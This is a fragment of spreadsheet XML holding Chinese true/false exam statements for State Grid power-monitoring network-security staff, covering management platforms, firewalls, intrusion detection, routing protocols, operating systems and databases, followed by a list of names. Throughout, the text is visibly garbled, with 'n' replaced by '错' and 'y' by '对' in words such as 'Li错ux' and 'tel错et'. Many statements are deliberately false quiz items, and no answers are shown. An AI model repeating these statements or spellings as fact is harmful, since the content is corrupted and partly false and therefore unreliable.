    <t>根据国家电网调〔2017〕1084号文件，网络安全管理平台数据采集功能，支持主机自身安全感知，通过在操作系统上部署安全服务代理程序读取状态信息。</t>
  </si>
  <si>
    <t>根据国家电网调〔2017〕1084号文件，网络安全管理平台模型管理功能，支持从设备、区域、厂商三种维度来展示和管理平台相关模型。</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>网络安全管理平台平台利用</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t>II</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型装置收集主站区域的设备日志。</t>
    </r>
  </si>
  <si>
    <t>网络安全管理平台仅通过s错mp/trap方式采集网络设备日志。</t>
  </si>
  <si>
    <t>厂站边界的纵向加密装置 和 II型采集装置 同主站通信渠道相同</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主站</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t>III</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>区的采集装置通过报文通信的方式将日志传给平台。</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">网络安全监测装置在运行过程中，电源模块只需要接一个即可。 </t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>在网络安全监测装置运行过程中，B码对时和</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t>NTP</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>对时选择一种即可。</t>
    </r>
  </si>
  <si>
    <t>网络安全监测装置本机名称必须和资产表中装置名称保持一致。</t>
  </si>
  <si>
    <t>省级网络安全管理平台监视告警数据库服务器需要配置2台，互为冗余。</t>
  </si>
  <si>
    <t>省级网络安全管理平台分析与审计安全核查服务器需要配置2台，互为冗余。</t>
  </si>
  <si>
    <t>网络安全监测装置与网络安全管理平台进行服务代理通信时，网络安全监测装置为服务端。</t>
  </si>
  <si>
    <t>网络安全监测装置服务代理端口默认为8800</t>
  </si>
  <si>
    <t>网络安全监测装置的默认通信参数配置端口不包含8000、2404端口</t>
  </si>
  <si>
    <t>网络安全监测装置的事件连续登陆失败的告警阈值为5次</t>
  </si>
  <si>
    <t>网络安全监测装置的时间同步功能应支持IRIG-B和SNTP对时方式</t>
  </si>
  <si>
    <t>网络安全管理平台采集信息的格式中，其中网络安全监测装置的设备类型定义为DCD</t>
  </si>
  <si>
    <t>网络安全管理平台采集信息的格式中，其中防病毒系统的设备类型定义为FBD</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>国家电网调度数据网作为专用网络，与管理信息网络实现物理隔离，全网部署MPLS VPN，各相关业务按安全分区原则接入相应</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>VPN</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>。</t>
    </r>
  </si>
  <si>
    <t>纵向加密装置可以通过网络安全管理平台配置策略与隧道。</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>反向隔离装置不支持带签名的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>E</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>语言文件传输。</t>
    </r>
  </si>
  <si>
    <t>隔离装置系统默认拒绝所有报文通过，只有在规则配置中允许通过的报文才可以通过</t>
  </si>
  <si>
    <t>隔离装置具有自动旁路功能。</t>
  </si>
  <si>
    <t>网络安全管理平台可以远程修改隔离装置的配置</t>
  </si>
  <si>
    <t>网络安全管理平台通过GB/T 31992-2015协议的方式，提供实时告警、历史告警功能。</t>
  </si>
  <si>
    <t>纵向加密装置支持旁路功能，在紧急故障状态下，可以旁路所有安全功能，作为透明桥接设备工作</t>
  </si>
  <si>
    <t>网络安全管理平台的实时告警范围包括安全事件类、设备故障类、人员操作类。</t>
  </si>
  <si>
    <t>纵向加密装置配置文件是以数据库文件的形式就行存储。</t>
  </si>
  <si>
    <t>网络安全监测装置装置出厂预置系统管理员、日志审计员以及普通用户</t>
  </si>
  <si>
    <t>一个调度数字证书都包含一个公钥，每个公钥对应一个私钥</t>
  </si>
  <si>
    <t>电力监控系统网络安全管理平台可以采集服务器告警日志信息。</t>
  </si>
  <si>
    <t>电力监控系统网络安全管理平台I/II区采集工作站需要安装加密卡。</t>
  </si>
  <si>
    <t>电力监控系统网络安全管理平台的日志格式中告警时间不包含秒。</t>
  </si>
  <si>
    <t>电力监控系统网络安全管理平台中防火墙设备包含管理日志、系统日志和安全日志。</t>
  </si>
  <si>
    <t>电力监控系统网络安全管理平台可以远程对防火墙进行配置管理。</t>
  </si>
  <si>
    <t>电力监控系统网络安全管理平台纵向管控功能，纵向拓扑图中以绿线表示两台纵向装置隧道建立成功。</t>
  </si>
  <si>
    <t>电力监控系统网络安全管理平台可以实现远程对纵向装置程序进行升级。</t>
  </si>
  <si>
    <t>电力监控系统网络安全管理平台接入防火墙设备时，需部署与之对应的日志解析库，用以将日志格式进行转换。</t>
  </si>
  <si>
    <t>电力监控系统网络安全管理平台的监视范围进一步扩展至变电站与电厂，并将监视内容扩展至网络设备、主机设备。</t>
  </si>
  <si>
    <t>电力监控系统网络安全管理平台的数据采集功能：使用多种采集手段，对部署于电力监控系统中的主机设备、网络设备、安全设备的运行信息、告警信息、配置信息进行采集。</t>
  </si>
  <si>
    <t>根据《电力监控系统网络安全监测装置技术规范（试行）》规定，I型网络安全监测装置对服务器、工作站、数据库、网络设备、安全防护设备的安全事件上传方式都是直接对采集信息的原文进行事件上传。</t>
  </si>
  <si>
    <t>根据《电力监控系统网络安全监测装置技术规范（试行）》规定，若厂站存在AB网，厂站服务器、工作站应与网络安全监测装置建立一条TCP长连接。</t>
  </si>
  <si>
    <t>根据《电力监控系统网络安全监测装置技术规范（试行）》规定，主站服务器、工作站的采集信息中关键文件/目录变更的告警信息的告警级别是重要。</t>
  </si>
  <si>
    <t>根据《电力监控系统网络安全监测装置技术规范（试行）》规定，主站服务器、工作站的采集信息中配置信息不需要周期性发送。</t>
  </si>
  <si>
    <t>根据《电力监控系统网络安全监测装置技术规范（试行）》规定，主站服务器、工作站的采集信息中配置信息和基线核查信息的采集格式按照自定义格式执行。</t>
  </si>
  <si>
    <t>根据《电力监控系统网络安全监测装置技术规范（试行）》规定，主站网络安全管理平台不可以停止或者取消正在执行的基线核查任务。</t>
  </si>
  <si>
    <t>根据《电力监控系统网络安全管理平台基础支撑功能规范（试行）》规定，电力监控系统网络安全管理平台的业务管理功能包括对监控系统业务地址段信息的添加、编辑、删除、导入、导出等功能，方便安全事件解决时查询对应IP的所属业务信息。</t>
  </si>
  <si>
    <t>根据《电力监控系统网络安全管理平台基础支撑功能规范（试行）》规定，主机存在大量未关闭的TCP链接属于重要告警</t>
  </si>
  <si>
    <t>根据《电力监控系统网络安全管理平台应用功能规范（试行）》规定，综合审计以安全威胁事件为对象，从威胁事件关联到其他所涉及的操作及告警的整体情况，进一步细化到具体的各条安全事件和告警，还原威胁发生的全过程。</t>
  </si>
  <si>
    <t>根据《电力监控系统网络安全监测装置技术规范（试行）》规定，网络安全监测装置与网络安全管理平台在数据传输之前需要进行双向身份认证。</t>
  </si>
  <si>
    <t>负荷控制管理系统对数据传输的实时性要求为毫秒级或秒级。</t>
  </si>
  <si>
    <t>非控制区的数据采集频度是毫秒级或秒级，其数据通信使用电力调度数据网的非实时子网。</t>
  </si>
  <si>
    <t>省级以上调控中心生产控制大区的安全管理平台不应当与管理信息大区的安全管理平台互联。</t>
  </si>
  <si>
    <t>电力监控系统生产控制大区和管理信息大区中的各业务系统不能同时以网络方式接入大屏幕投影系统。</t>
  </si>
  <si>
    <t>SM2是国家密码管理局发布的椭圆曲线公钥密码算法。</t>
  </si>
  <si>
    <t>OSI七层模型中传输层可以提供抗抵赖性。</t>
  </si>
  <si>
    <t>OSI 是开放的安全信息的缩写。</t>
  </si>
  <si>
    <t>不是所有针对信息系统的攻击行为都来自互联网或外部人员。</t>
  </si>
  <si>
    <t>在网络设备测评中网络设备应具有登录失败处理功能，可采取结束会话、限制非法登录次数和当网络登录连接超时自动退出等措施。</t>
  </si>
  <si>
    <t>ARP地址欺骗是一种常见的网络安全事件，其原理是将某个网段中的IP地址和MAC地址对应关系进行篡改，从而导致网段中的数据包不能正常到达正确的目的。</t>
  </si>
  <si>
    <t>UDP连接的数据传输是单向的。</t>
  </si>
  <si>
    <t>防火墙的外网口应禁止PING测试，内网口可以不限制。</t>
  </si>
  <si>
    <t>OSI体系有7个层次，TCP/IP体系有3个层次。</t>
  </si>
  <si>
    <t>OSI模型从下往上第五层是传输层，第六层是表示层。</t>
  </si>
  <si>
    <t>计算机信息系统的安全威胁同时来自内、外两个方面</t>
  </si>
  <si>
    <t>尽管执行缓冲溢出攻击对黑客的技术要求很高,但由于可以很容易获得这些执行缓冲溢出攻击的程序,因此没有经验的攻击者也能执行这种攻击</t>
  </si>
  <si>
    <t>会话劫持就是在一次正常的通信过程中，攻击者作为第三方参与到其中,直接联系变成了通过攻击者的间接联系。</t>
  </si>
  <si>
    <t>跨站请求伪造CSRF的存在，给我们普通最好的安全建议就是不要在登录网银或支付等操作页面时，同时去打开其他第三方的页面。</t>
  </si>
  <si>
    <t>HTTP的若干请求方法中，最常用的就是get和post，这两种方法的最大区别就是post在提交数据时，数据内容作为单独的数据体，而并不向get一样，将提交的数据包含在URL中</t>
  </si>
  <si>
    <t>拒绝服务式（DOS）攻击，可以理解为通过各种手段，例如发送大量虚假请求，造成服务器资源大量消耗，而无法正常响应客户的正常请求</t>
  </si>
  <si>
    <t>分布式拒绝服务DDOS，泛指利用一个庞大的网络或僵尸网络想同一个目标同时发送攻击，期威胁性比DOS更大，而且经过层层跳转，线索更难追踪</t>
  </si>
  <si>
    <t>smurf攻击，攻击者构造被攻击对象的ip作为攻击数据包的源IP，然后向网络中构造一个icmp请求的广播包，最后造成所有的主机正常回应给被攻击对象，造成被攻击对象死机</t>
  </si>
  <si>
    <t>缓冲区溢出攻击，通过往程序的缓冲区写超出其长度的内容，造成缓冲区的溢出，从而破坏程序的堆栈，使程序转而执行其它指令，以达到攻击的目的。缓冲区溢出漏洞，目前只存在于操作系统中</t>
  </si>
  <si>
    <t>社会工程学——攻击者冒充合法用户发送邮件或打电话给管理人员，以骗取用户口令和其他信息；垃圾搜索：攻击者通过搜索被攻击者的废弃物，得到与攻击系统有关的信息，如果用户将口令写在纸上又随便丢弃，则很容易成为垃圾搜索的攻击对象。</t>
  </si>
  <si>
    <t>渗透的基本步骤分为踩点、漏洞查找、攻击系统、扫尾工作。</t>
  </si>
  <si>
    <t>使用非root用户身份运行BIND应用能够降低缓冲区溢出攻击所带来的危险</t>
  </si>
  <si>
    <t>XSS跨站脚本攻击，指的是恶意攻击者往Web页面里插入恶意html代码，当用户浏览该页之时，嵌入其中Web里面的html代码会被执行，从而达到恶意用户的特殊目的，这种攻击属于主动式的安全攻击。</t>
  </si>
  <si>
    <t>社会工程学攻击说白了就是利用收买，诱骗等各种手段，骗取信息，而不是直接从技术手段对目标发动攻击</t>
  </si>
  <si>
    <t>在考虑风险评估结果的基础上，应选择适合的信息安全风险处置选项</t>
  </si>
  <si>
    <t>组织应定义并应用信息安全风险处置过程，以制定正式的信息安全风险处置计划</t>
  </si>
  <si>
    <t>组织的信息安全管理体系中不包括本《信息技术 安全技术 信息安全管理体系 要求》中要求的文件化信息</t>
  </si>
  <si>
    <t>组织应实现信息安全风险处置计划</t>
  </si>
  <si>
    <t>每个运行OSPF的路由器都有一个Router ID。</t>
  </si>
  <si>
    <t>OSPF的DR选出的同时，也选出BDR来。DR故障后，在BDR选举出其中一个成为新的DR。</t>
  </si>
  <si>
    <t>OSPF的DR选举时可以确定的。</t>
  </si>
  <si>
    <t>BGP路由协议采用TCP作为传送协议，端口号179。</t>
  </si>
  <si>
    <t>BGP路由协议在运行过程中，通过接收和发送Hello-alive消息来检测相互之间的连接是否正常的。</t>
  </si>
  <si>
    <t>成为BGP路由的途径包括纯动态注入、半动态注入和静态注入。</t>
  </si>
  <si>
    <t>IS-IS是基于链路状态算法的IGP协议，它仅支持TCP/IP环境。</t>
  </si>
  <si>
    <t>一个ISIS协议地址编码方式NSAP由三个部分组成：区域地址，S对stem ID和Nsel。</t>
  </si>
  <si>
    <t xml:space="preserve">BGP 协议是一种基于链路状态的路由协议，因此它能够避免路由环路。 </t>
  </si>
  <si>
    <t>判断BGP 邻居是属于EBGP 还是IBGP 是看BGP 邻居之间是否有直连的物理链路  。</t>
  </si>
  <si>
    <t xml:space="preserve">BGP Speaker 从IBGP 获得的路由是否会向它所有的EBGP 邻居和IBGP 邻居通告则依赖于IGP和BGP同步的情况来决定。    </t>
  </si>
  <si>
    <t>BGP 同步的目的是为了避免出现误导外部AS 路由器的现象发生 。</t>
  </si>
  <si>
    <t>BGP 同步是指IGP 和BGP 之间的同步 。</t>
  </si>
  <si>
    <t>包过滤防火墙是防火墙最基本的安全防范功能，它运行在应用层。</t>
  </si>
  <si>
    <t>对网络设备进行远程管理时，应采用SSH或https协议的方式访问，以防止被窃听。</t>
  </si>
  <si>
    <t>三层交换机、入侵检测系统、防火墙均能够起到访问控制功能。</t>
  </si>
  <si>
    <t>硬件防火墙是设置在内部网络与外部网络 ( 如互联网 ) 之间，实施访问控制策略的一个或一组系统</t>
  </si>
  <si>
    <t>防火墙黑名单库的大小和过滤的有效性是内容过滤产品非常重要的指标。</t>
  </si>
  <si>
    <t>防火墙实时黑名单是简单黑名单的进一步发展，可以从根本上解决垃圾邮件问题。</t>
  </si>
  <si>
    <t>防火墙规则集的内容决定了防火墙的真正功能。</t>
  </si>
  <si>
    <t>防火墙对用户只能通过用户名和口令进行认证。</t>
  </si>
  <si>
    <t xml:space="preserve">包过滤型和复合型防火墙应具备NAT功能，防火墙可支持单项NAT。 </t>
  </si>
  <si>
    <t>防火墙应能够实时或者以报表形式输出流量统计结果。</t>
  </si>
  <si>
    <t>防火墙应支持把日志存储和备份在一个安全、永久性的地方。</t>
  </si>
  <si>
    <t>对隔离设备、防火墙设备应设置双机热备，并定期离线备份配置文件。</t>
  </si>
  <si>
    <t>防火墙只能对IP地址进行限制和过滤。</t>
  </si>
  <si>
    <t>防火墙技术不能阻止被病毒感染的程序或文件的传递。</t>
  </si>
  <si>
    <t>防火墙的功能是防止网外未经授权对内网的访问</t>
  </si>
  <si>
    <t>目前主流防火墙通常包括NAT模块、集中访问控制模块、临时访问端口表、认证与访问控制系统等。</t>
  </si>
  <si>
    <t>防火墙安全策略一旦设定，就不能再做任何改变。</t>
  </si>
  <si>
    <t>防火墙策略采用最小访问控制原则，“缺省全部开通，按需求关闭”。</t>
  </si>
  <si>
    <t>电能量计量系统（TMR）与调度管理系统之间需采用防火墙进行隔离。</t>
  </si>
  <si>
    <t>每个网卡的MAC地址通常是唯一确定的，在防火墙中建立一个IP地址与MAC地址的对应表，它的主要作用是防止非法用户进行IP地址欺骗。</t>
  </si>
  <si>
    <t>为提高运行可靠性，防火墙应设置双机热备，配置心跳口属性，本机心跳口地址必须与对端设备的心跳口配置处于相邻网段。</t>
  </si>
  <si>
    <t>防火墙应保障系统时间和时钟服务器一致，支持NTP网络对时的设备应配置NTP对时服务器，不支持NTP服务的安全设备应不定期设定时间与时钟服务器保持一致。</t>
  </si>
  <si>
    <t>防火墙设备应配置IC卡/USB Ke对+用户名密码认证。</t>
  </si>
  <si>
    <t>防火墙设备的口令应半年更换一次，不应与历史密码相同，并密文存储。</t>
  </si>
  <si>
    <t>防火墙设备非业务需求策略只允许开放ICMP协议。</t>
  </si>
  <si>
    <t>生产控制大区中，支持NTP网络对时的防火墙设备配置的NTP服务器为外部NTP时间服务器。</t>
  </si>
  <si>
    <t>入侵防御系统是IDS。</t>
  </si>
  <si>
    <t>入侵检测技术是用于检测任何损害或企图损害系统的机密性、完整性或可用性等行为的一种网络安全技术。</t>
  </si>
  <si>
    <t>异常入侵检测的前提条件是入侵性活动集作为异常活动集的子集，而理想状况是异常活动集与入侵性活动集相等。</t>
  </si>
  <si>
    <t>入侵检测系统IDS分为主机级NIDS和网络级HIDS。</t>
  </si>
  <si>
    <t>漏洞扫描是入侵检测系统的一项功能。</t>
  </si>
  <si>
    <t>使用人侵检测系统(IDS)检测的时候，首先面临的问题就是决定应该在系统的什么位置安装检测和分析入侵行为用的感应器(Se错sor)或检测引擎(E错gi错e)。</t>
  </si>
  <si>
    <t>入侵检测被认为是防火墙之后的第二道安全闸门，在不影响网络性能的情况下能对网络进行监测，从而提供对内部攻击、外部攻击的实时防护。</t>
  </si>
  <si>
    <t>IPS在IDS的基础上增加了防御功能，且部署方式也相同。</t>
  </si>
  <si>
    <t>入侵检测系统的基本工作原理是嗅探。</t>
  </si>
  <si>
    <t>在计算机上安装防病毒软件之后，就不必担心计算机受到病毒攻击。</t>
  </si>
  <si>
    <t>计算机病毒可能在用户打开 "txt" 文件时被启动。</t>
  </si>
  <si>
    <t>生产控制大区由于在安全隔离装置内网，而且病毒库、木马库的更新不能在线进行，所以不必部署恶意代码防护系统。</t>
  </si>
  <si>
    <t>生产控制大区的恶意代码防护系统可在线更新特征代码库。</t>
  </si>
  <si>
    <t>电力监控系统中的操作系统允许外部存储设备自动播放或自动打开功能，但应当采取措施避免木马、病毒程序的入侵。</t>
  </si>
  <si>
    <t>跨站脚本攻击（XSS）指将恶意代码嵌入到用户浏览的WEB网页中，从而达到恶意的目的。</t>
  </si>
  <si>
    <t>系统已打了最新的补丁，防病毒软件也更新了最新的规则库，当我们安装来源不明的软件时，仍可能感染病毒。</t>
  </si>
  <si>
    <t>生产控制大区与管理信息大区可以共用一套防恶意代码管理服务器。</t>
  </si>
  <si>
    <t>当局域网内某台主机运行ARP欺骗的木马程序时，会欺骗局域网内所有主机，让所有上网的流量必须经过病毒主机，但不会欺骗路由器。</t>
  </si>
  <si>
    <t>主机安装防恶意代码软件或独立部署恶意代码防护设备，只需进行安全性测试。</t>
  </si>
  <si>
    <t>杀毒软件报告发现病毒 Macro.Melissa, 由该病毒名称可以推断出病毒类型是文件型</t>
  </si>
  <si>
    <t>恶意代码采用的隐藏技术一般有文件隐藏、进程隐藏、网络连接隐藏</t>
  </si>
  <si>
    <t>防恶意代码系统加固时病毒库代码的更新需使用 U 盘和专机查杀等技术手段，避免因跨区拷贝导致外网恶意代码引入到安全区内造成重大安全隐患。</t>
  </si>
  <si>
    <t>勒索软件（Ra错somware），又称勒索病毒，是一种特殊的恶意软件，被归类为伪造访问式攻击</t>
  </si>
  <si>
    <t>勒索软件的行为违反了《网络安全法》第二十七条规定，任何个人和组织不得从事非法侵入他人网络、干扰他人网络正常功能、窃取网络数据等危害网络安全的活动。</t>
  </si>
  <si>
    <t>AAA服务的本地认证需要配置RADIUS方案或TACACS+方案。</t>
  </si>
  <si>
    <t>RADIUS是比TACACS+更安全的AAA认证服务的协议。</t>
  </si>
  <si>
    <t>采用tel错et进行远程登录维护时，所有发出的命令都是通过明文在网络上传输的。</t>
  </si>
  <si>
    <t>生产控制大区的交换机必须禁止通用HTTP服务，但可以使用基于安全SSL协议的HTTPS服务。</t>
  </si>
  <si>
    <t>在通过tel错et命令对厂站端路由器进行远端维护时，必须进行严格的身份认证，严禁使用初始用户名、密码。</t>
  </si>
  <si>
    <t>通常我们采用访问控制列表，通过源IP对SSH用户进行控制</t>
  </si>
  <si>
    <t>我们使用的SNMP协议，主要使用V1、V2C、V3三个版本。</t>
  </si>
  <si>
    <t>必须严格控制网络设备审计日志访问权限，只有管理员账户和审计账户可以访问</t>
  </si>
  <si>
    <t>OSPF建立邻居关系的两个设备的ke对 ID必须保持唯一性，否则不能建立邻居关系</t>
  </si>
  <si>
    <t>对于大型网络或安全级别高的网络，OSPF无认证时，对通信设备的攻击只要能“窃入”物理链路，即可以合法的身份进行攻击，篡改路由表，造成严重后果。</t>
  </si>
  <si>
    <t>在合理配置网络设备管理员账户、审计账户、普通账户后，还需相应配置可用的权限，才能真正起到权限控制的作用</t>
  </si>
  <si>
    <t>日志与安全审计是针对路由器本身日志、网络管理协议方面考虑安全审计方面的配置，以方便事后追溯</t>
  </si>
  <si>
    <t>SSH和SNMP可通过一个访问控制列表实现远程访问控制。</t>
  </si>
  <si>
    <t>BGP仅支持基于MD5的身份认证</t>
  </si>
  <si>
    <t>配置SNMP协议包括使用版本（V2及以上），配置s错mp的团体字。</t>
  </si>
  <si>
    <t>配置厂站网络设备日志传输原地址时应该将厂站路由器与汇聚路由器的互联地址做为源地址</t>
  </si>
  <si>
    <t>华为路由器配置下面访问控制列表时，默认最后有一条de错对 a错对的命令，所以不需要手动输入</t>
  </si>
  <si>
    <t>中兴交换机设备配置SSH登录时，设备默认生成密钥</t>
  </si>
  <si>
    <t>NTP用于在一系列分布式的服务器和客户端之间同步时钟，NTP的报文是通过UDP协议传输的</t>
  </si>
  <si>
    <t>华为设备没有批量关闭交换机接口的命令，需要手工逐个关闭</t>
  </si>
  <si>
    <t>凝思操作系统中的root用户不受操作系统自主访问控制的限制</t>
  </si>
  <si>
    <t>基于性能考虑，麒麟操作系统提供了文件安全删除标记设置和文件安全删除工具，只有拥有安全删除标记的文件或者使用文件安全删除工具才进行重用处理。</t>
  </si>
  <si>
    <t xml:space="preserve">麒麟操作系统的多级安全策略中，MLS 策略实现了基于 BLP 模型的多级安全策略。 </t>
  </si>
  <si>
    <t>在操作系统中，审计日志数据需要及时清理保存备份，不然日志信息有可能会被覆盖</t>
  </si>
  <si>
    <t>在安全操作系统中，安全管理员可以进行安全策略相关的配置操作，同时也有权限查看安全操作相关的审计日志。</t>
  </si>
  <si>
    <t>麒麟操作系统通过安全注意键（ Secure Atte错tio错 Ke对，简写为 SAK）实现了可信路径</t>
  </si>
  <si>
    <t>安全操作系统身份鉴别应管理操作系统口令权限、口令强度，包括复杂性、长度、登录失败策略、更新周期等。</t>
  </si>
  <si>
    <t>网络配置管理方面，应管理终端网络环境，禁止用户随意更改IP和MAC地址；应具有IP和MAC地址绑定管理；应禁止用户随意更改计算机的名称</t>
  </si>
  <si>
    <t>安全操作系统相关安全功能应开启，满足三级安全操作系统的相关要求</t>
  </si>
  <si>
    <t>文件客体重用用于防止文件删除后的信息残留，防止通过直接访问磁盘的方式获取原来所存储的文件内容信息。</t>
  </si>
  <si>
    <t>麒麟操作系统中，MLS策略下进程主体的安全标记包含一个当前安全级以及一个安全级调整范围，客体的安全标记包含一个安全级。</t>
  </si>
  <si>
    <t>凝思操作系统是为以Li错ux为基础二次开发的安全操作系统</t>
  </si>
  <si>
    <t>按照102号电力监控系统安全防护标准化管理要求，应保证鼠标、键盘、U-KEY（除人机工作站和自动化运维工作站外，禁止U-KEY的使用）等常用外设的正常使用，其他设备一律禁用</t>
  </si>
  <si>
    <t>进行远程管理时，人员运程登录应使用SSH协议，禁止使用tel错et、rlogi错其他协议远程登录</t>
  </si>
  <si>
    <t>在安全操作系统中，关于MLS支配关系，若安全级 label1 为 low，则不论安全级 label2 的值为多少，均有 label2 被 label1支配；</t>
  </si>
  <si>
    <t>每个Li错ux/UNIX系统中仅有一个特权用户，就是root用户。</t>
  </si>
  <si>
    <t>Li错ux是一个单用户、多进程、多线程，实时性较好的功能强大而稳定的操作系统。</t>
  </si>
  <si>
    <t>shadow文件是不能被普通用户读取的，只有超级用户才有权读取。</t>
  </si>
  <si>
    <t>与wi错dows 不同的是，Li错ux/u错ix 中不存在预置账户。</t>
  </si>
  <si>
    <t>Solaris系统中，攻击者在系统中增加帐户会改i错etd.co错f 、hosts文件：</t>
  </si>
  <si>
    <t>常见的操作系统包括 DOS 、UNIX 、Li错ux、Wi错dows 、 Netware 、 Oracle 等。</t>
  </si>
  <si>
    <t>Wi错dows 防火墙能帮助阻止计算机病毒和蠕虫进入用户的计算机，但该防火墙不能检测或清除已经感染计算机的病毒和蠕虫</t>
  </si>
  <si>
    <t>本地用户组中的Guests(来宾用户)组成员可以登录和运行应用程序，也可以关闭操作系统，但是其功能比Users有更多的限制。</t>
  </si>
  <si>
    <t>与Wi错dows系统不一样的是UNIX／Li错ux操作系统中不存在预置帐号。</t>
  </si>
  <si>
    <t xml:space="preserve"> UNIX／Li错ux系统中一个用户可以同时属于多个用户组。</t>
  </si>
  <si>
    <t>标准的UNIX／Li错ux系统以属主(Ow错er)、属组(Group)、其他人(World)三个粒度进行控制。特权用户不受这种访问控制的限制。</t>
  </si>
  <si>
    <t>UNIX／Li错ux系统中，设置文件许可位以使得文件的所有者比其他用户拥有更少的权限是不可能的。</t>
  </si>
  <si>
    <t>UNIX／Li错ux系统和Wi错dows系统类似，每一个系统用户都有一个主目录。</t>
  </si>
  <si>
    <t>数据库对象操作员是“四权分立”新增加的一类用户。</t>
  </si>
  <si>
    <t>达梦数据库提供对 LDAP 的支持，主要利用 LDAP 服务器存储的账户数据信息，验证账户是否 是数据库的合法用户。</t>
  </si>
  <si>
    <t>KERBEROS 是为 TCP/IP 网络系统设计的可信的第三方认证协议，DM 不支持 KERBEROS 身份验证。</t>
  </si>
  <si>
    <t>Ki错gbaseES 用控制文件来记录数据库实例的状态信息,如:Ki错gbaseES 数据库实例所管理 的各种文件信息、检查点信息、事务状态信息等。</t>
  </si>
  <si>
    <t>Ki错gbaseES 利用日志文件来防止断电之类的故障导致的数据丢失。对每个修改数据库内容的 操作,Ki错gbaseES 都会自动为其生成多条日志记录,并将其记录到日志文件中。</t>
  </si>
  <si>
    <t>两到多个事务相互争用资源时,可能发生死锁。Ki错gbaseES 支持自动检测死锁,并且自动处理。</t>
  </si>
  <si>
    <t>数据库可以任意更改现有数据文件的大小，也可以添加新的数据文件</t>
  </si>
  <si>
    <t>数据库撤销对象权限时可能会产生级联效应</t>
  </si>
  <si>
    <t>数据库事务提交后，对数据库的更新操作可能还停留在服务器的缓冲区中，而未写入到磁盘，即使此时系统出现故障，事务的执行结果也不会丢失，称为事务的一致性。</t>
  </si>
  <si>
    <t>数据库回滚段的数据不会永久保留，当该事务结束时，回滚段被释放</t>
  </si>
  <si>
    <t>数据库COMMIT 之后还可以通过 ROLLBACK 语句执行回滚操作</t>
  </si>
  <si>
    <t>数据库当重做日志文件写满时，系统会立即将其清空再重新写入新的记录</t>
  </si>
  <si>
    <t>数据库视图是从一个或几个基表（或视图）导出的表，但它是一个虚表</t>
  </si>
  <si>
    <t>数据库中，可以通过TRUNCATE命令实现对表的删除</t>
  </si>
  <si>
    <t>达梦数据库版本有安全版本和普通版本的区别，通过产品的 Lice错se 进行区分</t>
  </si>
  <si>
    <t>国网网考题</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>电力系统考试</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>晋城电力系统考试</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>薛芳慈</t>
  </si>
  <si>
    <t>经川谊</t>
  </si>
  <si>
    <t>周芹敏</t>
  </si>
  <si>
    <t>黎霆烨</t>
  </si>
  <si>
    <t>杭贝进</t>
  </si>
  <si>
    <t>宗能湛</t>
  </si>
  <si>
    <t>雷碧杏</t>
  </si>
  <si>
    <t>洪渊名</t>
  </si>
  <si>
    <t>王业和</t>
  </si>
  <si>
    <t>盛情瑗</t>
  </si>
  <si>
    <t>吴霞情</t>
  </si>
  <si>
    <t>徐颉波</t>
  </si>
  <si>
    <t>裘喜举</t>
  </si>
  <si>
    <t>高沛文</t>
  </si>
  <si>
    <t>萧卿竹</t>
  </si>
  <si>
    <t>高侃纯</t>
  </si>
  <si>
    <t>牧飙朴</t>
  </si>
  <si>
    <t>卓妤玥</t>
  </si>
  <si>
    <t>劳冶想</t>
  </si>
  <si>
    <t>翁若莺</t>
  </si>
  <si>
    <t>填空</t>
  </si>
  <si>
    <t>填空测试——试题名称</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>填空测试 -问题1</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>填空测试 -问题2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</si>
</sst>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等线"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="9"/>
      <name val="等线"/>
      <family val="3"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color indexed="8"/>
      <name val="等线"/>
